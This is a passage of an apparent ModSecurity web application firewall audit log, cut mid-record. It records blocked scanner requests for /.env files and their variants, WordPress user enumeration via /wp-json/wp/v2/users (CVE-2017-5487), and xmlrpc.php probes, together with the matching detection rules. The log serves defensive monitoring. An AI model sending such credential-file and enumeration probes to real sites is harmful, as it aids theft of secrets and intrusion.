"Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746180874326985 787 (- - -) Stopwatch2: 1746180874326985 787; combined=333, p1=306, p2=0, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5936b573-Z-- --d3c9e056-A-- [02/May/2025:17:27:54 +0700] aBSeKvNNWdC6CAybkqMJ7QAAAMw 103.236.140.4 38166 103.236.140.4 8181 --d3c9e056-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 159.65.144.72 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 159.65.144.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d3c9e056-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3c9e056-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746181674759305 835 (- - -) Stopwatch2: 1746181674759305 835; combined=335, p1=300, p2=0, p3=0, p4=0, p5=35, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3c9e056-Z-- --ec2d141e-A-- [02/May/2025:18:55:27 +0700] aBSyr8wZl97WzW7hutNVSAAAABI 103.236.140.4 39126 103.236.140.4 8181 --ec2d141e-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.172.158.128 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.172.158.128 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ec2d141e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec2d141e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746186927430930 887 (- - -) Stopwatch2: 1746186927430930 887; combined=412, p1=383, p2=0, p3=0, p4=0, p5=29, sr=179, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec2d141e-Z-- --ff231b62-A-- [02/May/2025:19:27:00 +0700] aBS6FBXwRgnphTBdhpRnngAAAI0 103.236.140.4 58172 103.236.140.4 8181 --ff231b62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff231b62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff231b62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746188820626158 2595 (- - -) Stopwatch2: 1746188820626158 2595; combined=1200, p1=405, p2=770, p3=0, p4=0, p5=25, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff231b62-Z-- --a8a6c030-A-- [02/May/2025:19:27:04 +0700] aBS6GBXwRgnphTBdhpRnoAAAAIY 103.236.140.4 58236 103.236.140.4 8181 --a8a6c030-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.219 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8a6c030-C-- demo.sayHello --a8a6c030-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8a6c030-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746188824720228 6808 (- - -) Stopwatch2: 1746188824720228 6808; combined=4808, p1=603, p2=3954, p3=41, p4=42, p5=99, sr=77, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8a6c030-Z-- --4c0b8225-A-- [02/May/2025:20:17:47 +0700] aBTF-_NNWdC6CAybkqMQAgAAANI 103.236.140.4 35516 103.236.140.4 8181 --4c0b8225-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4c0b8225-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c0b8225-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746191867503522 3089 (- - -) Stopwatch2: 1746191867503522 3089; combined=1379, p1=500, p2=850, p3=0, p4=0, p5=29, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c0b8225-Z-- --3fc7a757-A-- [02/May/2025:20:17:50 +0700] aBTF_vNNWdC6CAybkqMQAwAAAMM 103.236.140.4 35520 103.236.140.4 8181 --3fc7a757-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3fc7a757-C-- demo.sayHello --3fc7a757-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fc7a757-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746191870557571 6434 (- - -) Stopwatch2: 1746191870557571 6434; combined=4589, p1=644, p2=3707, p3=39, p4=42, p5=95, sr=82, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fc7a757-Z-- --59a6415a-A-- [02/May/2025:20:34:19 +0700] aBTJ28wZl97WzW7hutNbcgAAAA0 103.236.140.4 35660 103.236.140.4 8181 --59a6415a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --59a6415a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59a6415a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746192859913850 3116 (- - -) Stopwatch2: 1746192859913850 3116; combined=1367, p1=456, p2=875, p3=0, p4=0, p5=35, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59a6415a-Z-- --f7b7727d-A-- [02/May/2025:20:34:22 +0700] aBTJ3qGyUvHV-cebb6411QAAAEo 103.236.140.4 35664 103.236.140.4 8181 --f7b7727d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f7b7727d-C-- demo.sayHello --f7b7727d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7b7727d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746192862697719 5501 (- - -) Stopwatch2: 1746192862697719 5501; combined=4075, p1=562, p2=3299, p3=29, p4=33, p5=90, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7b7727d-Z-- --b461875f-A-- [02/May/2025:20:42:42 +0700] aBTL0swZl97WzW7hutNbeAAAAAQ 103.236.140.4 35702 103.236.140.4 8181 --b461875f-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b461875f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b461875f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193362528881 848 (- - -) Stopwatch2: 1746193362528881 848; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b461875f-Z-- --e3e45f00-A-- [02/May/2025:20:42:43 +0700] aBTL08wZl97WzW7hutNbeQAAAAA 103.236.140.4 35704 103.236.140.4 8181 --e3e45f00-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e3e45f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3e45f00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193363822481 740 (- - -) Stopwatch2: 1746193363822481 740; combined=294, p1=264, p2=0, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3e45f00-Z-- --c4369d58-A-- [02/May/2025:20:42:45 +0700] aBTL1cwZl97WzW7hutNbegAAAAY 103.236.140.4 35706 103.236.140.4 8181 --c4369d58-B-- GET /.env.save HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c4369d58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4369d58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193365135747 710 (- - -) Stopwatch2: 1746193365135747 710; combined=301, p1=267, p2=0, p3=0, p4=0, p5=33, sr=112, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4369d58-Z-- --62e2883c-A-- [02/May/2025:20:42:46 +0700] aBTL1swZl97WzW7hutNbewAAAAM 103.236.140.4 35708 103.236.140.4 8181 --62e2883c-B-- GET /.env.prod HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --62e2883c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62e2883c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193366454066 952 (- - -) Stopwatch2: 1746193366454066 952; combined=437, p1=396, p2=0, p3=0, p4=0, p5=41, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62e2883c-Z-- --5550432d-A-- [02/May/2025:20:42:54 +0700] aBTL3hXwRgnphTBdhpRpewAAAIM 103.236.140.4 35726 103.236.140.4 8181 --5550432d-B-- GET /dev/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5550432d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5550432d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193374581872 684 (- - -) Stopwatch2: 1746193374581872 684; combined=263, p1=229, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5550432d-Z-- --9d4ff06e-A-- [02/May/2025:20:42:55 +0700] aBTL38wZl97WzW7hutNbggAAABU 103.236.140.4 35728 103.236.140.4 8181 --9d4ff06e-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 93.123.109.81 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9d4ff06e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d4ff06e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746193375275239 659 (- - -) Stopwatch2: 1746193375275239 659; combined=248, p1=217, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d4ff06e-Z-- --0552ce79-A-- [02/May/2025:21:26:04 +0700] aBTV_BXwRgnphTBdhpRplgAAAIQ 103.236.140.4 36022 103.236.140.4 8181 --0552ce79-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0552ce79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0552ce79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746195964643888 790 (- - -) Stopwatch2: 1746195964643888 790; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0552ce79-Z-- --e5c46977-A-- [02/May/2025:21:26:16 +0700] aBTWCPNNWdC6CAybkqMQMwAAAMI 103.236.140.4 36024 103.236.140.4 8181 --e5c46977-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e5c46977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5c46977-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746195976057222 794 (- - -) Stopwatch2: 1746195976057222 794; combined=315, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5c46977-Z-- --af0a4139-A-- [02/May/2025:21:28:30 +0700] aBTWjhXwRgnphTBdhpRpmQAAAJA 103.236.140.4 36038 103.236.140.4 8181 --af0a4139-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --af0a4139-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af0a4139-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746196110152497 792 (- - -) Stopwatch2: 1746196110152497 792; combined=319, p1=280, p2=0, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af0a4139-Z-- --ad31ae0b-A-- [02/May/2025:21:28:34 +0700] aBTWkhXwRgnphTBdhpRpmgAAAI4 103.236.140.4 36040 103.236.140.4 8181 --ad31ae0b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ad31ae0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad31ae0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746196114886740 641 (- - -) Stopwatch2: 1746196114886740 641; combined=260, p1=226, p2=0, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad31ae0b-Z-- --064c2c43-A-- [02/May/2025:21:49:43 +0700] aBTbh6GyUvHV-cebb642IwAAAEw 103.236.140.4 36428 103.236.140.4 8181 --064c2c43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; WAS-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --064c2c43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --064c2c43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file 